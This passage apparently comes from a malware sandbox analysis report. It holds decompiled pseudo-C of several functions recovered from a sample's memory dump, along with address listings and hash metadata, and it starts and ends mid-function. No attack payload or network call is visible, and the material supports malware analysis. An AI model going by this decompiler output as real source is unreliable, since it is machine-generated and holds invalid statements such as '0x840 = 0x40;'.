						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E00AA2280( *[fs:0x30], 0xb78550);
						_t139 =  *0xb77b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E00ABF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E00A9FFB0(_t193, _t235, 0xb78550);
								L5:
								return E00ADD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E00A81C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0xb77b9c; // 0x0
							_t235 = L00AA4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0xb77b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E00ABA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E00A9FFB0(_t193, _t235, 0xb78550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L00AA77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L00AA77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0xb77b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0xb77b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E00AC37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0xb77b9c; // 0x0
									_t214 = L00AA4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E00AC37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0xb77b10 =  *0xb77b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0xb77b04 =  *0xb77b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L00AA77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L00AA77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0xb77b08 =  *0xb77b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E00AC57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E00ACF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L00AA77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E00ABA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L00AA77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E00AC96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                    0x00a9849b
                                                    0x00a9849b
                                                    0x00a9849b
                                                    0x00a9849b
                                                    0x00a9849d
                                                    0x00a984a2
                                                    0x00a984a7
                                                    0x00a984b1
                                                    0x00a984d8
                                                    0x00000000
                                                    0x00a984b3
                                                    0x00a984c4
                                                    0x00a984c9
                                                    0x00a984cd
                                                    0x00a984cf
                                                    0x00a984cf
                                                    0x00a984d6
                                                    0x00a984e6
                                                    0x00a984e9
                                                    0x00a984ec
                                                    0x00a984ef
                                                    0x00a984f2
                                                    0x00a984f4
                                                    0x00a984fc
                                                    0x00a98501
                                                    0x00a98506
                                                    0x00a98509
                                                    0x00a986e0
                                                    0x00a986e5
                                                    0x00a986e8
                                                    0x00a986ed
                                                    0x00a986f0
                                                    0x00a986f2
                                                    0x00ae9afd
                                                    0x00ae9b02
                                                    0x00a984da
                                                    0x00a984df
                                                    0x00a984df
                                                    0x00a986fa
                                                    0x00a986fd
                                                    0x00a986fe
                                                    0x00a98701
                                                    0x00a98706
                                                    0x00a98709
                                                    0x00a9870b
                                                    0x00000000
                                                    0x00000000
                                                    0x00a98711
                                                    0x00a98725
                                                    0x00a98727
                                                    0x00a9872a
                                                    0x00a9872c
                                                    0x00ae9af0
                                                    0x00ae9af5
                                                    0x00a98732
                                                    0x00a98732
                                                    0x00a98732
                                                    0x00a98735
                                                    0x00a98737
                                                    0x00a98515
                                                    0x00a98515
                                                    0x00a98518
                                                    0x00a9851d
                                                    0x00a98523
                                                    0x00a98527
                                                    0x00a9852b
                                                    0x00a98537
                                                    0x00a98539
                                                    0x00a9853c
                                                    0x00a9853e
                                                    0x00a9868c
                                                    0x00a98691
                                                    0x00a98699
                                                    0x00a9869b
                                                    0x00a98744
                                                    0x00a98748
                                                    0x00a986a1
                                                    0x00a986a1
                                                    0x00a986a1
                                                    0x00a986a4
                                                    0x00a986a8
                                                    0x00ae9bdf
                                                    0x00ae9bdf
                                                    0x00a986ae
                                                    0x00a986b0
                                                    0x00000000
                                                    0x00a986b6
                                                    0x00000000
                                                    0x00ae9be9
                                                    0x00a986b0
                                                    0x00a98544
                                                    0x00a9854a
                                                    0x00a9854d
                                                    0x00a98551
                                                    0x00a9876e
                                                    0x00a98778
                                                    0x00a9877b
                                                    0x00a98780
                                                    0x00a98557
                                                    0x00a98557
                                                    0x00a9855d
                                                    0x00a9855d
                                                    0x00a9856b
                                                    0x00a9856e
                                                    0x00a98570
                                                    0x00a98573
                                                    0x00a98576
                                                    0x00a98576
                                                    0x00a98579
                                                    0x00a9857b
                                                    0x00000000
                                                    0x00000000
                                                    0x00a98581
                                                    0x00a985a0
                                                    0x00a985a2
                                                    0x00a985a5
                                                    0x00a985a7
                                                    0x00ae9b1b
                                                    0x00ae9b1b
                                                    0x00a9862e
                                                    0x00a9862e
                                                    0x00a98631
                                                    0x00a98631
                                                    0x00a98634
                                                    0x00a98636
                                                    0x00a98669
                                                    0x00a98669
                                                    0x00a9866b
                                                    0x00ae9bbf
                                                    0x00ae9bc4
                                                    0x00ae9bc8
                                                    0x00ae9bce
                                                    0x00ae9bce
                                                    0x00a98671
                                                    0x00a98671
                                                    0x00a98674
                                                    0x00a98676
                                                    0x00ae9bae
                                                    0x00ae9bae
                                                    0x00a98676
                                                    0x00a9867c
                                                    0x00a9867e
                                                    0x00a98688
                                                    0x00a98688
                                                    0x00000000
                                                    0x00a9867e
                                                    0x00a98638
                                                    0x00a98638
                                                    0x00a9863b
                                                    0x00a9863e
                                                    0x00a9863f
                                                    0x00a98642
                                                    0x00a98645
                                                    0x00a98648
                                                    0x00a9864d
                                                    0x00ae9b69
                                                    0x00ae9b6e
                                                    0x00ae9b7b
                                                    0x00ae9b81
                                                    0x00ae9b85
                                                    0x00ae9b89
                                                    0x00ae9ba7
                                                    0x00ae9b8b
                                                    0x00ae9b91
                                                    0x00ae9b9a
                                                    0x00ae9b9f
                                                    0x00ae9b9f
                                                    0x00a98788
                                                    0x00a9878d
                                                    0x00a98763
                                                    0x00a98763
                                                    0x00a98766
                                                    0x00000000
                                                    0x00a98766
                                                    0x00ae9b70
                                                    0x00000000
                                                    0x00ae9b70
                                                    0x00a98656
                                                    0x00a9865a
                                                    0x00a9865c
                                                    0x00a98752
                                                    0x00a98756
                                                    0x00000000
                                                    0x00000000
                                                    0x00a9875e
                                                    0x00000000
                                                    0x00a9875e
                                                    0x00a98662
                                                    0x00a98662
                                                    0x00a98662
                                                    0x00a98666
                                                    0x00000000
                                                    0x00a98666
                                                    0x00a985b7
                                                    0x00a985b9
                                                    0x00a985bc
                                                    0x00a985bf
                                                    0x00a985cc
                                                    0x00a985d1
                                                    0x00a985d4
                                                    0x00a985db
                                                    0x00a985de
                                                    0x00a985e0
                                                    0x00ae9b5f
                                                    0x00000000
                                                    0x00ae9b5f
                                                    0x00a985e6
                                                    0x00a985ea
                                                    0x00a986c3
                                                    0x00a986c5
                                                    0x00a986c8
                                                    0x00a986ca
                                                    0x00ae9b16
                                                    0x00000000
                                                    0x00ae9b16
                                                    0x00a986d6
                                                    0x00a985f6
                                                    0x00a985f6
                                                    0x00a985f9
                                                    0x00a98602
                                                    0x00a98606
                                                    0x00a9860a
                                                    0x00a9860b
                                                    0x00a9860e
                                                    0x00a98611
                                                    0x00000000
                                                    0x00a98611
                                                    0x00a985f3
                                                    0x00000000
                                                    0x00a985f3
                                                    0x00a98619
                                                    0x00a9861e
                                                    0x00a9861e
                                                    0x00a98621
                                                    0x00a98622
                                                    0x00a98623
                                                    0x00a98625
                                                    0x00a9862c
                                                    0x00000000
                                                    0x00a9873d
                                                    0x00000000
                                                    0x00a9873d
                                                    0x00a98737
                                                    0x00a9850f
                                                    0x00a98512
                                                    0x00000000
                                                    0x00a98512
                                                    0x00000000
                                                    0x00a984d6

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 149fa81ce5cbcc0bff732f9e0e94146b31e645d2363e53843a0df9b3569e4ec3
                                                    • Instruction ID: a6ebbfd9430a0a5782d28ebad414240848cbe7f00470542312671058f56b807a
                                                    • Opcode Fuzzy Hash: 149fa81ce5cbcc0bff732f9e0e94146b31e645d2363e53843a0df9b3569e4ec3
                                                    • Instruction Fuzzy Hash: 1CB116B0E04349DFCF14DFA9C984AAEBBF5BF4A304F20412AE505AB256DB74AD45CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AB513A Relevance: .3, Instructions: 258COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E00AB513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0xb7d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E00ACD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E00AA2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L00AA4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E00ACF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E00A9FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0xb7b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E00ACB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                    0x00ab5142
                                                    0x00ab514c
                                                    0x00ab5150
                                                    0x00ab5157
                                                    0x00ab5159
                                                    0x00ab515e
                                                    0x00ab5165
                                                    0x00ab5169
                                                    0x00ab516c
                                                    0x00ab5172
                                                    0x00ab5176
                                                    0x00ab517a
                                                    0x00ab517a
                                                    0x00ab517a
                                                    0x00ab517f
                                                    0x00af6d8b
                                                    0x00af6d8e
                                                    0x00af6d91
                                                    0x00af6d95
                                                    0x00af6d98
                                                    0x00af6d9c
                                                    0x00af6da0
                                                    0x00af6da3
                                                    0x00af6da7
                                                    0x00af6e26
                                                    0x00af6e26
                                                    0x00af6e2a
                                                    0x00ab51f9
                                                    0x00ab51f9
                                                    0x00ab51fe
                                                    0x00af6e33
                                                    0x00af6e33
                                                    0x00af6e39
                                                    0x00af6e3d
                                                    0x00af6e46
                                                    0x00af6e50
                                                    0x00000000
                                                    0x00000000
                                                    0x00af6e52
                                                    0x00af6e53
                                                    0x00af6e56
                                                    0x00af6e5d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00af6e5f
                                                    0x00af6e67
                                                    0x00af6e77
                                                    0x00af6e7f
                                                    0x00af6e80
                                                    0x00af6e88
                                                    0x00af6e90
                                                    0x00af6e9f
                                                    0x00af6ea5
                                                    0x00af6ea9
                                                    0x00af6eb1
                                                    0x00af6ebf
                                                    0x00000000
                                                    0x00000000
                                                    0x00af6ecf
                                                    0x00af6ed3
                                                    0x00000000
                                                    0x00000000
                                                    0x00af6edb
                                                    0x00af6ede
                                                    0x00af6ee1
                                                    0x00af6ee8
                                                    0x00af6eeb
                                                    0x00af6eed
                                                    0x00af6ef0
                                                    0x00af6ef4
                                                    0x00af6ef8
                                                    0x00af6efc
                                                    0x00000000
                                                    0x00000000
                                                    0x00af6f0d
                                                    0x00af6f11
                                                    0x00af6f32
                                                    0x00af6f37
                                                    0x00af6f3b
                                                    0x00af6f3e
                                                    0x00af6f41
                                                    0x00af6f46
                                                    0x00000000
                                                    0x00000000
                                                    0x00af6f4c
                                                    0x00af6f50
                                                    0x00af6f50
                                                    0x00af6f54
                                                    0x00af6f62
                                                    0x00af6f65
                                                    0x00af6f6d
                                                    0x00af6f7b
                                                    0x00af6f7b
                                                    0x00af6f93
                                                    0x00af6f98
                                                    0x00af6fa0
                                                    0x00af6fa6
                                                    0x00af6fb3
                                                    0x00af6fb6
                                                    0x00af6fbf
                                                    0x00af6fc1
                                                    0x00af6fd5
                                                    0x00af6fda
                                                    0x00af6fda
                                                    0x00af6fdd
                                                    0x00af6fe2
                                                    0x00af6fe7
                                                    0x00af6feb
                                                    0x00af6fef
                                                    0x00af6ff3
                                                    0x00ab520c
                                                    0x00ab520c
                                                    0x00ab520f
                                                    0x00ab5215
                                                    0x00ab5234
                                                    0x00ab523a
                                                    0x00ab523a
                                                    0x00ab5244
                                                    0x00ab5245
                                                    0x00ab5246
                                                    0x00ab5251
                                                    0x00ab5251
                                                    0x00af6f13
                                                    0x00af6f17
                                                    0x00af6f17
                                                    0x00af6f18
                                                    0x00af6f1b
                                                    0x00af6f1f
                                                    0x00af6f23
                                                    0x00000000
                                                    0x00af6f28
                                                    0x00ab5204
                                                    0x00ab5204
                                                    0x00ab5208
                                                    0x00000000
                                                    0x00ab5208
                                                    0x00ab5185
                                                    0x00ab5188
                                                    0x00ab518a
                                                    0x00ab518e
                                                    0x00ab5195
                                                    0x00af6db1
                                                    0x00af6db5
                                                    0x00af6db9
                                                    0x00ab519b
                                                    0x00ab519b
                                                    0x00ab519e
                                                    0x00ab51a7
                                                    0x00ab51a9
                                                    0x00ab51a9
                                                    0x00ab51b5
                                                    0x00ab51b8
                                                    0x00ab51bb
                                                    0x00ab51be
                                                    0x00ab51c1
                                                    0x00ab51c5
                                                    0x00ab51c9
                                                    0x00ab51cd
                                                    0x00ab51cd
                                                    0x00ab51d8
                                                    0x00ab51dc
                                                    0x00ab51e0
                                                    0x00af6dcc
                                                    0x00af6dd0
                                                    0x00af6dd5
                                                    0x00af6ddd
                                                    0x00af6de1
                                                    0x00af6de1
                                                    0x00af6de5
                                                    0x00af6deb
                                                    0x00af6df1
                                                    0x00af6df7
                                                    0x00af6dfd
                                                    0x00af6e01
                                                    0x00af6e05
                                                    0x00af6e09
                                                    0x00af6e0d
                                                    0x00af6e11
                                                    0x00af6e11
                                                    0x00ab51eb
                                                    0x00af6e1a
                                                    0x00af6e1f
                                                    0x00af6e21
                                                    0x00af6e23
                                                    0x00000000
                                                    0x00ab51f1
                                                    0x00ab51f1
                                                    0x00000000
                                                    0x00ab51f1

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 482043fbc1b400eda9c0e7f0d356cfb7a4257633bead8457d2e224645d7e0d9a
                                                    • Instruction ID: f61989c5aee04fe1d93cc85eb1ffd27ca29b09a39d3438defc776c5b31bef0cf
                                                    • Opcode Fuzzy Hash: 482043fbc1b400eda9c0e7f0d356cfb7a4257633bead8457d2e224645d7e0d9a
                                                    • Instruction Fuzzy Hash: 71C100756097808FD354CF68C580A6AFBF1BF88304F188A6EF9998B352D771E945CB42
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AB03E2 Relevance: .3, Instructions: 254COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 74%
                                                    			E00AB03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0xb7d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E00AB0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E00ACB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E00A9B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0xb77c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E00AA7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E00AA7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
